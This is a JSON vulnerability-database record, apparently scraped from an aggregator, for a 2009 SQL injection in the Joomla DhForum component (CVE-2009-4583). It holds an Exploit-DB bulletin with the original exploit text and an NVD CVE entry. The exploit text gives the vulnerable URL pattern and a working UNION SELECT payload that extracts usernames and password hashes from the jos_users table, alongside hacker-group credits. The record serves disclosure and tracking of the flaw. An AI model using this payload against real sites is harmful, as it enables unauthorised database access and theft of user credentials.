{"id": "EDB-ID:10742", "hash": "98e90c46c12a3b519d33947fc6f518e1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component com_dhforum SQL Injection Vulnerability", "description": "Joomla Component com_dhforum SQL Injection Vulnerability. CVE-2009-4583. Webapps exploit for php platform", "published": "2009-12-27T00:00:00", "modified": "2009-12-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/10742/", "reporter": "ViRuSMaN ", "references": [], "cvelist": ["CVE-2009-4583"], "lastseen": "2016-02-01T13:06:10", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "vulnersScore": 10.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/10742/", "sourceData": "==============================================================================\r\n_ _ _ _ _ _\r\n/ \\ | | | | / \\ | | | |\r\n/ _ \\ | | | | / _ \\ | |_| |\r\n/ ___ \\ | |___ | |___ / ___ \\ | _ |\r\nIN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\r\n\r\n\r\n==============================================================================\r\n======\r\n[\u00bb] Joomla Component com_dhforum SQL Injection Vulnerability\r\n========================================================================\r\n\r\n======\r\n\r\n[\u00bb] Script: [ joomla Component ]\r\n[\u00bb] Language: [ PHP ]\r\n[\u00bb] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]\r\n[\u00bb] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]\r\n[\u00bb] My Home: [ HackTeach.Org , Islam-Attack.Com ]\r\n\r\n###########################################################################\r\n\r\n===[ Exploit ]===\r\n\r\n[\u00bb] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]\r\n\r\n\r\n\r\n===[ Live Demo ]===\r\n\r\n[\u00bb] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat\r\n\r\n(username,0x3a,password)+from+jos_users--\r\n\r\nAuthor: ViRuSMaN <-\r\n\r\n###########################################################################", "osvdbidlist": ["61565"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-08-17T11:14:35", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/55157", "http://www.securityfocus.com/bid/37475", "http://packetstormsecurity.org/0912-exploits/joomladhforum-sql.txt", "http://www.exploit-db.com/exploits/10742"], "description": "SQL injection vulnerability in the DhForum (com_dhforum) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a grouplist action to index.php.", "edition": 2, "reporter": "NVD", "published": "2010-01-06T17:00:11", "title": "CVE-2009-4583", "type": "cve", "enchantments": {"score": {"modified": "2017-08-17T11:14:35", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4583"], "scanner": [], "modified": "2017-08-16T21:31:39", "cpe": ["cpe:/a:joomla:com_dhforum"], "id": "CVE-2009-4583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4583", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}